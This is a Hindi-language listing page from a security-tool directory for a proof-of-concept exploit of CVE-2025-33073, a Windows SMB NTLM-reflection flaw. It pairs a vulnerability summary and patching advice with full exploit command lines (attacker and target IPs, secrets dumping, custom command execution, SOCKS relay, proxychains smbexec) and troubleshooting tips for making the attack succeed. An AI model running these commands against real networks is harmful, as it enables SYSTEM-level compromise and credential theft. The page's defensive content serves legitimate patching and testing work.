Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
भेद्यता विश्लेषणशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

रिपॉजिटरी देखें
1610 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

✨ CVE-2025-33073: विंडोज SMB RCE भेद्यता 🚨

🔥 उच्च-गंभीरता प्रमाणित दूरस्थ कोड निष्पादन 🔥 विंडोज SMB क्लाइंट में अनुचित पहुंच नियंत्रण (CWE-284)


🛡️ एक नज़र में मुख्य विवरण

टूल डाउनलोड करें
पहलूविवरण
CVSS v3.1 स्कोर8.8 (उच्च) 🔥
प्रभावित सिस्टमविंडोज 10, 11, सर्वर 2012–2025 (सभी संस्करण) 💻
प्रकटीकरण तिथि10 जून, 2025 📅 (जून 2025 पैच मंगलवार में पैच किया गया)
शोषणजंगली में सक्रिय रूप से शोषित 😱
21 अक्टूबर, 2025 को CISA KEV में जोड़ा गया
हमला वेक्टरनेटवर्क (प्रमाणित) 🌐
प्रभावSYSTEM-स्तर कोड निष्पादन 👑
केरबेरोस रिले के माध्यम से पार्श्व गति
बाईपासNTLM प्रतिबिंब शमन ⚡

🛠️ तत्काल शमन

  1. अभी पैच करें! 🔧
    → माइक्रोसॉफ्ट अपडेट लागू करें (जैसे, KB5060998)
    → माइक्रोसॉफ्ट अपडेट गाइड 🔗

  2. SMB हस्ताक्षर सक्षम करें ✍️
    → सभी क्लाइंट और सर्वर पर लागू करें
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. NTLM प्रतिबंधित करें 🚫
    → जहां संभव हो NTLM को ब्लॉक करें
    → EDR टूल्स के साथ रिले प्रयासों की निगरानी करें

  4. स्वचालित समाधान? 🤖
    → बड़े पैमाने पर सुधार के लिए Vicarius vRx या कस्टम स्क्रिप्ट का उपयोग करें


⚠️ यह क्यों मायने रखता है

  • पारंपरिक NTLM सुरक्षा को बायपास करता है 🛑
  • SMB हस्ताक्षर लागू न होने पर भी काम करता है
  • गलत कॉन्फ़िगर किए गए AD वातावरण में पूर्ण डोमेन अधिग्रहण सक्षम करता है 🏰

15 नवंबर, 2025 तक स्थिति:
✅ पैच किया गया
❌ अभी भी अपैच किए गए सिस्टम में शोषित
🔔 CISA समय सीमा: 10 नवंबर, 2025 ⏰


⚠️ उदाहरण उपयोग

GUI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

कस्टम कमांड secretsdump चलाने के बजाय एक कस्टम कमांड निष्पादित किया जा सकता है।

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS SYSTEM के रूप में वैध कनेक्शन स्थापित होने के बाद कमांड के अधिक गुप्त निष्पादन के लिए। --target और --target-ip यहां समान होना चाहिए।

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

साथ ही, SAM डंप करने के बजाय proxychains के माध्यम से एक कस्टम कमांड चलाया जा सकता है।

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

DNS आवश्यकता के बिना मैन्युअल शोषण

यदि आप डिवाइस के समान प्रसारण डोमेन में हैं और यह LLMNR विषाक्तता के लिए संवेदनशील है, तो DNS रिकॉर्ड पंजीकृत किए बिना डिवाइस का शोषण करना संभव है।

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

समस्या निवारण:

  • मैंने देखा है कि कभी-कभी हमला काम नहीं करता क्योंकि हमले के लिए होस्टनाम का उपयोग किया जाता है जिसके परिणामस्वरूप Kali से DNS लुकअप होता है। यदि Kali DNS सर्वर का उपयोग नहीं कर रहा है या आपको impacket-ntlmrelayx से '/ FAILED' संदेश मिलता है, तो होस्ट को अपनी /etc/hosts फ़ाइल में जोड़ने का प्रयास करें। इससे हमला काम करना चाहिए।

  • यदि IP का उपयोग कर रहे हैं तो हमला काम करना चाहिए। कभी-कभी इसे कई बार चलाने से विफलता के बजाय सफलता मिल सकती है। अब तक यह पूरी तरह से स्पष्ट नहीं है कि ऐसा क्यों होता है। मुझे लगता है इसका नेटवर्किंग से कुछ संबंध है।

  • -M या --method का उपयोग करके कोई अन्य कर्स विधि आज़माएं।


Wireshark:

स्थानीय NTLM प्रमाणीकरण होता है

455252866-0a3fe643-2d52-427a-91f2-991770732f62

स्थानीय NTLM प्रमाणीकरण नहीं होता जिसके परिणामस्वरूप विफल प्रयास होता है

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

जानना अच्छा है:

  • xterm मध्य माउस बटन से कॉपी और पेस्ट करने की अनुमति देता है।
  • DNS रिकॉर्ड क्लाइंट को भी ज्ञात होना चाहिए, कुछ अवसरों पर इसमें अधिक समय लग सकता है। अधिक समय से मेरा मतलब है कुछ मिनट देना।
  • यह सिर्फ एक PoC है जिसका अर्थ है कि AV/EDR बाईपास को बायपास करने का प्रयास नहीं किया गया है। अपने जोखिम पर उपयोग करें।

इंतजार न करें — आज ही पैच करें! 🛑
आपके नेटवर्क की सुरक्षा इस पर निर्भर करती है। 💪